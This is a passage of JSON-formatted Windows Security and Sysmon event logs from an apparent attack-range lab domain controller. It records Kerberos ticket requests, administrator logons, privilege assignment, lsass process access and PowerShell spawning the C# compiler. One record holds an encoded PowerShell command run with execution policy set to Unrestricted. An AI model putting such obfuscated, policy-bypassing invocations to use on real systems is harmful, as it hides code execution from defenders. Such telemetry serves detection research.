{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220474,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220475,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{8325D2E2-F565-F530-B8F0-304DFF73B4A1}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{8325D2E2-F565-F530-B8F0-304DFF73B4A1}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220476,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{8325D2E2-F565-F530-B8F0-304DFF73B4A1}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{8325D2E2-F565-F530-B8F0-304DFF73B4A1}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220477,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x68258\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{8325D2E2-F565-F530-B8F0-304DFF73B4A1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x68258","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{8325D2E2-F565-F530-B8F0-304DFF73B4A1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220478,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x68258\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x68258","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4424,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.907\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.907","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4425,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.907\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.907","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4426,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:58:52.032\r\nProcessGuid: {41C8662E-20BB-5F25-0000-0010A2710600}\r\nProcessId: 1632\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\wbimrl4c.dll\r\nCreationUtcTime: 2020-08-01 07:58:52.032","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:58:52.032","ProcessGuid":"{41C8662E-20BB-5F25-0000-0010A2710600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\wbimrl4c.dll","CreationUtcTime":"2020-08-01 07:58:52.032","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4427,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.032\r\nProcessGuid: {41C8662E-20BB-5F25-0000-0010A2710600}\r\nProcessId: 1632\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\wbimrl4c.cmdline\r\nCreationUtcTime: 2020-08-01 07:58:52.032","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.032","ProcessGuid":"{41C8662E-20BB-5F25-0000-0010A2710600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\wbimrl4c.cmdline","CreationUtcTime":"2020-08-01 07:58:52.032","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4428,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.049\r\nProcessGuid: {41C8662E-20BC-5F25-0000-0010FA820600}\r\nProcessId: 4124\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\wbimrl4c.cmdline\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20BB-5F25-0000-0020E0610600}\r\nLogonId: 0x661E0\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52\r\nParentProcessGuid: {41C8662E-20BB-5F25-0000-0010A2710600}\r\nParentProcessId: 1632\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.049","ProcessGuid":"{41C8662E-20BC-5F25-0000-0010FA820600}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Visual C# Command Line Compiler","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"csc.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\wbimrl4c.cmdline\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20BB-5F25-0000-0020E0610600}","LogonId":"0x661e0","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52","ParentProcessGuid":"{41C8662E-20BB-5F25-0000-0010A2710600}","ParentProcessId":"1632","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 